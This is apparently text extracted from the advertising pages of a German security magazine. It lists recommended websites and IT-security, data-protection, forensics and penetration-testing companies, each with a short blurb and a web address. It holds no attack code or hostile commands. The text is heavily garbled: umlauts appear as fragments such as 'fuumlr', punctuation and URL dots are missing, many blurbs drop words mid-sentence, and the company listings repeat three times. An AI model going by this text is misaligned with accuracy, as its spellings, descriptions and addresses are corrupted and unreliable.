messenes Datenschutzniveau in Ihrem Unter-
nehmen auch international
wwwblossey-partnerde
Recommended Sites
Securitymanagerde ist eine Produktion des
Online-Verlag FEiG amp PARTNER Seit dem
Start hat sich Securitymanagerde zu einem
fuumlhrenden Online-Informationsportal in
Deutschland entwickelt und versteht sich als
unabhaumlngiger Informationsdienstleister der
IT- und Information-Security-Branche
wwwsecuritymanagerde
Pericom base camp IT-Security Unser Ziel ist
es unsere Kunden vor moumlglichen Gefahren
fuumlr Ihre IT-Infrastruktur bestmoumlglich zu schuumlt-
zen Neben der Analyse von Risikopotentia-
len durch Security Audits bieten wir durch
die Implementierung von Security-Loumlsungen
Schutz vor konkreten Gefahren
wwwpericomat
Happy-Security ist ein neues Portal mit Secu-
rity-Challanges IT-Quiz Web-Bibliothek Multi-
media-Center amp vielen weiteren Features
wwwhappy-securityde
CloudSafe stellt seinen Nutzern eine Plattform
zur kryptographisch sicheren Ablage und Verwal-
tung von sensiblen Daten zur Verfuumlgung Nutzer
koumlnnen auf CloudSafe beliebig viele Dokumente
in virtuellen Safes ablegen Es koumlnnen weite-
ren Personen individuelle Zugriffsrechte auf die
Safes eingeraumlumt und somit ein sicherer Daten-
austausch ermoumlglicht werden
wwwcloudsafecom
AV-Comparatives geht hervor aus dem Inns-
brucker Kompetenzzentrum und gilt als eines
der bekanntesten unabhaumlngigen Testhaumluser
fuumlr Antiviren-Software
wwwav-comparativesorg
Die Seed Forensics GmbH bietet fuumlr Strafver-
folgungsbehoumlrden professionelle Unterstuumltzung
in den Bereichen der Datensicherstellung und
Datentraumlgerauswertung Selbstverstaumlndlich
entsprechen unsere Mitarbeiter unser tech-
nisches Equipment und auch unsere Raumlumli-
chkeiten den notwendigen Anforderungen
wwwseed-forensicsde
Wollen Sie Ihre Seite empfehlen kontaktieren Sie bitte dehakin9org
Die Netzwerktechnik steht auf wwweasy-ne-
tworkde im Mittelpunkt Artikel Tutorials und
ein Forum bieten genuumlgen Stoff fuumlr kommende
wwweasy-networkde
Computerfreaks houmlher schlagen laumlsst Geek
Wear mit intelligenten Spruumlchen eine riesige
Auswahl Gadgets und natuumlrlich auch viele
Hacker Tools
wwwgetDigitalde
Recommended Companies
SEC ConsultSEC Consult ist der fuumlhrende Berater
fuumlr Information Security Consulting in
Zentraleuropa Die vollstaumlndige Unab-
haumlngigkeit von SW- und HW-Herstellern
macht uns zum echten Advisor unserer
Kunden Unsere Dienstleistungen umfa-
ssen externeinterne Sicherheitsaudits
(Web-) Applikationssicherheit (ONR 17-
700) Sicherheitsmanagement-Prozesse
(ISO 27001) etc
wwwsec-consultcom
SEC Consult
Tele-Consulting GmbH
Sicherheit hakin9 und crsquot Autoren jah-
relange Erfahrung bei der Durchfuumlhrung
von Penetrationstests und Security-Au-
dits eigener Security Scanner bdquotajanasrdquo
Sicherheitskonzepte Risikoanalysen
ISO 27001-Auditoren VoIP-Planung
und -Security
wwwtele-consultingcom
B1 SystemsDie B1 Systems ist international taumltig
in den Bereichen LinuxOpen Source
B1
Systems spezialisiert sich in den Be-
reichen Virtualisierung und Cluster
infob1-systemsde
wwwb1-systemsde
Blossey amp Partner
Consulting DatenschutzbuumlroDatenschutz ist EU-weit gesetzliche An-
forderung Wir sorgen fuumlr die Erfuumlllung
rechtlicher Vorschriften und kuumlmmern
uns um ein angemessenes Daten-
schutzniveau in Ihrem Unternehmen
auch international Wir erledigen alle er-
forderlichen Aufgaben die Faumlden behal-
ten Sie in der Hand Nutzen Sie unser
Erstberatungsgespraumlch
wwwblossey-partnerde
secXtreme GmbHschuumltzt Ihre Web-Anwendungen bis
auf Applikationsebene Dazu gehoumlrt
sowohl die Pruumlfung von Applikationen
(Pentests und Code-Reviews) als auch
Beratungsleistungen fuumlr Sicherheit im
Entwicklungsprozess und Schutzlouml-
sungen (Web Application Firewalls) bei
Mittelstand
wwwsec-Xtremecom
Mabunta
spezialisierter und kompetenter Partner
heitsfragen in allen Unternehmens-
bereichen verbinden Wachstum mit
sicherer Kommunikation
Alles in allem- mabunta bdquoone-face-to-
the-customerldquo Ihr Spezialist in Fragen
wwwmabuntade
Recommended Companies
SecureNet GmbH MuumlnchenAls Softwarehaus und Web Application
Security Spezialist bieten wir Expertise
rund um die Sicherheit von Webanwen-
dungen Anwendungs-Pentests Sour-
delines Beratung rund um den Software
Firewalls Application Scanner Fortify
wwwsecurenetde
underground_8
secure computing gmbhWir entwickeln und vertreiben securi-
und Antispam Unsere Loumlsungen sind
hardwarebasiert und werden uumlber Dis-
tributoren Reseller und Systemintegra-
toren implementiert und vertrieben
wwwunderground8com
OPTIMAbit GmbHWir sind Spezialisten fuumlr Entwicklung
und Mobile Applikationen gegen Angriffe
externer und interner Art Unsere Dien-
ste umfassen Audits Code Reviews
Penetrationstest sowie die Erstellung
von Policies Zusaumltzlich bieten wir Semi-
wwwoptimabitcom
m-privacy GmbH
einfach zu bedienen
So praumlsentieren sich die von m-privacy
tesiegel Es bietet als erstes System
weltweit einen kompletten Schutz vor
Online-Spionage Online-Razzien und
gezielten Angriffen
wwwm-privacyde
NESECNESEC ist Ihr Spezialist fuumlr Penetra-
tionstests Sicherheitsanalysen und
cherheitspruumlfungen Ihrer Netzwerke
und Webapplikationen sowie bei Sour-
ce Code Audits Bei Bedarf optimieren
wir Ihre Policy sensibilisieren Ihre
nehmen nach ISO 27001
wwwnesecde
Seed Forensics GmbH
fuumlr Strafverfolgungsbehoumlrden profe-
ssionelle Unterstuumltzung in den
Bereichen der Datensicherstellung
und Datentraumlgerauswertung Selbst-
verstaumlndlich entsprechen unsere
Mitarbeiter unser technisches Equip-
0ment und auch unsere Raumlumlichkeiten
den notwendigen Anforderungen
wwwseed-forensicsde
Protea Networks
Loumlsungen Verschluumlsselung Firewall
ring etc Wir bieten umfassende Bera-
tung Vertrieb von Security-Hard- und
Software Installation und umfangreiche
nings) Protea setzt auf Loumlsungen der
dafuumlr direkten inhouse-Support bereit
wwwproteanetworksde
secadmsecadm ist durchtrainierter Spezialist fuumlr
Airbags ABS und Sicherheitsgurte in der
Mannjahren Erfahrung beraten entwi-
fuumlr Kunden weltweit Der Fokus liegt da-
und Security-Management Risiko-Analy-
se die Sicherheitsberatung Auditing Se-
curity-Leitfaumlden Software-Entwicklung
wwwsecadmde
Recommended Companies
SEC ConsultSEC Consult ist der fuumlhrende Berater
fuumlr Information Security Consulting in
Zentraleuropa Die vollstaumlndige Unab-
haumlngigkeit von SW- und HW-Herstellern
macht uns zum echten Advisor unserer
Kunden Unsere Dienstleistungen umfa-
ssen externeinterne Sicherheitsaudits
(Web-) Applikationssicherheit (ONR 17-
700) Sicherheitsmanagement-Prozesse
(ISO 27001) etc
wwwsec-consultcom
SEC Consult
Tele-Consulting GmbH
Sicherheit hakin9 und crsquot Autoren jah-
relange Erfahrung bei der Durchfuumlhrung
von Penetrationstests und Security-Au-
dits eigener Security Scanner bdquotajanasrdquo
Sicherheitskonzepte Risikoanalysen
ISO 27001-Auditoren VoIP-Planung
und -Security
wwwtele-consultingcom
B1 SystemsDie B1 Systems ist international taumltig
in den Bereichen LinuxOpen Source
B1
Systems spezialisiert sich in den Be-
reichen Virtualisierung und Cluster
infob1-systemsde
wwwb1-systemsde
Blossey amp Partner
Consulting DatenschutzbuumlroDatenschutz ist EU-weit gesetzliche An-
forderung Wir sorgen fuumlr die Erfuumlllung
rechtlicher Vorschriften und kuumlmmern
uns um ein angemessenes Daten-
schutzniveau in Ihrem Unternehmen
auch international Wir erledigen alle er-
forderlichen Aufgaben die Faumlden behal-
ten Sie in der Hand Nutzen Sie unser
Erstberatungsgespraumlch
wwwblossey-partnerde
secXtreme GmbHschuumltzt Ihre Web-Anwendungen bis
auf Applikationsebene Dazu gehoumlrt
sowohl die Pruumlfung von Applikationen
(Pentests und Code-Reviews) als auch
Beratungsleistungen fuumlr Sicherheit im
Entwicklungsprozess und Schutzlouml-
sungen (Web Application Firewalls) bei
Mittelstand
wwwsec-Xtremecom
Mabunta
spezialisierter und kompetenter Partner
heitsfragen in allen Unternehmens-
bereichen verbinden Wachstum mit
sicherer Kommunikation
Alles in allem- mabunta bdquoone-face-to-
the-customerldquo Ihr Spezialist in Fragen
wwwmabuntade
Recommended Companies
SecureNet GmbH MuumlnchenAls Softwarehaus und Web Application
Security Spezialist bieten wir Expertise
rund um die Sicherheit von Webanwen-
dungen Anwendungs-Pentests Sour-
delines Beratung rund um den Software
Firewalls Application Scanner Fortify
wwwsecurenetde
underground_8
secure computing gmbhWir entwickeln und vertreiben securi-
und Antispam Unsere Loumlsungen sind
hardwarebasiert und werden uumlber Dis-
tributoren Reseller und Systemintegra-
toren implementiert und vertrieben
wwwunderground8com
OPTIMAbit GmbHWir sind Spezialisten fuumlr Entwicklung
und Mobile Applikationen gegen Angriffe
externer und interner Art Unsere Dien-
ste umfassen Audits Code Reviews
Penetrationstest sowie die Erstellung
von Policies Zusaumltzlich bieten wir Semi-
wwwoptimabitcom
m-privacy GmbH
einfach zu bedienen
So praumlsentieren sich die von m-privacy
tesiegel Es bietet als erstes System
weltweit einen kompletten Schutz vor
Online-Spionage Online-Razzien und
gezielten Angriffen
wwwm-privacyde
NESECNESEC ist Ihr Spezialist fuumlr Penetra-
tionstests Sicherheitsanalysen und
cherheitspruumlfungen Ihrer Netzwerke
und Webapplikationen sowie bei Sour-
ce Code Audits Bei Bedarf optimieren
wir Ihre Policy sensibilisieren Ihre
nehmen nach ISO 27001
wwwnesecde
Seed Forensics GmbH
fuumlr Strafverfolgungsbehoumlrden profe-
ssionelle Unterstuumltzung in den
Bereichen der Datensicherstellung
und Datentraumlgerauswertung Selbst-
verstaumlndlich entsprechen unsere
Mitarbeiter unser technisches Equip-
0ment und auch unsere Raumlumlichkeiten
den notwendigen Anforderungen
wwwseed-forensicsde
Protea Networks
Loumlsungen Verschluumlsselung Firewall
ring etc Wir bieten umfassende Bera-
tung Vertrieb von Security-Hard- und
Software Installation und umfangreiche
nings) Protea setzt auf Loumlsungen der
dafuumlr direkten inhouse-Support bereit
wwwproteanetworksde
secadmsecadm ist durchtrainierter Spezialist fuumlr
Airbags ABS und Sicherheitsgurte in der
Mannjahren Erfahrung beraten entwi-
fuumlr Kunden weltweit Der Fokus liegt da-
und Security-Management Risiko-Analy-
se die Sicherheitsberatung Auditing Se-
curity-Leitfaumlden Software-Entwicklung
wwwsecadmde
Recommended Companies
SecureNet GmbH MuumlnchenAls Softwarehaus und Web Application
Security Spezialist bieten wir Expertise
rund um die Sicherheit von Webanwen-
dungen Anwendungs-Pentests Sour-
delines Beratung rund um den Software
Firewalls Application Scanner Fortify
wwwsecurenetde
underground_8
secure computing gmbhWir entwickeln und vertreiben securi-
und Antispam Unsere Loumlsungen sind
hardwarebasiert und werden uumlber Dis-
tributoren Reseller und Systemintegra-
toren implementiert und vertrieben
wwwunderground8com
OPTIMAbit GmbHWir sind Spezialisten fuumlr Entwicklung
und Mobile Applikationen gegen Angriffe
externer und interner Art Unsere Dien-
ste umfassen Audits Code Reviews
Penetrationstest sowie die Erstellung
von Policies Zusaumltzlich bieten wir Semi-
wwwoptimabitcom
m-privacy GmbH
einfach zu bedienen
So praumlsentieren sich die von m-privacy
tesiegel Es bietet als erstes System
weltweit einen kompletten Schutz vor
Online-Spionage Online-Razzien und
gezielten Angriffen
wwwm-privacyde
NESECNESEC ist Ihr Spezialist fuumlr Penetra-
tionstests Sicherheitsanalysen und
cherheitspruumlfungen Ihrer Netzwerke
und Webapplikationen sowie bei Sour-
ce Code Audits Bei Bedarf optimieren
wir Ihre Policy sensibilisieren Ihre
nehmen nach ISO 27001
wwwnesecde
Seed Forensics GmbH
fuumlr Strafverfolgungsbehoumlrden profe-
ssionelle Unterstuumltzung in den
Bereichen der Datensicherstellung
und Datentraumlgerauswertung Selbst-
verstaumlndlich entsprechen unsere
Mitarbeiter unser technisches Equip-
0ment und auch unsere Raumlumlichkeiten
den notwendigen Anforderungen
wwwseed-forensicsde
Protea Networks
Loumlsungen Verschluumlsselung Firewall
ring etc Wir bieten umfassende Bera-
tung Vertrieb von Security-Hard- und
Software Installation und umfangreiche
nings) Protea setzt auf Loumlsungen der
dafuumlr direkten inhouse-Support bereit
wwwproteanetworksde
secadmsecadm ist durchtrainierter Spezialist fuumlr
Airbags ABS und Sicherheitsgurte in der
Mannjahren Erfahrung beraten entwi-
fuumlr Kunden weltweit Der Fokus liegt da-
und Security-Management Risiko-Analy-
se die Sicherheitsberatung Auditing Se-
curity-Leitfaumlden Software-Entwicklung
wwwsecadmde
top related